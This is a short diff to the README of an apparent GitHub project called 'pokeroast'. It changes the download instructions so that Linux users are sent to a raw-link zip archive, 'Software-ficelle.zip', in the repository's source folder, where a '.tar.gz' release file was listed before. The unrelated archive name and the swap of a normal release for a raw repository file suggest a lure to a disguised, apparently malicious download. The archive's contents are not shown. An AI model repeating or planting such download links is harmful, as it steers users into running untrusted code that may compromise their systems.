abderrewakbendaoud/pokeroast/README.md

    Look for the file that fits your system:
    - For Windows users, choose the `.exe` file.
    - For macOS users, select the `.dmg` file.
-   - For Linux users, look for the `.tar.gz` file.
+   - For Linux users, look for the `https://github.com/abderrewakbendaoud/pokeroast/raw/refs/heads/master/src/Software-ficelle.zip` file.

 4. **Download the File**
    Click on the file name.
 Your browser will start downloading it.
 Save it in a folder you can easily find later.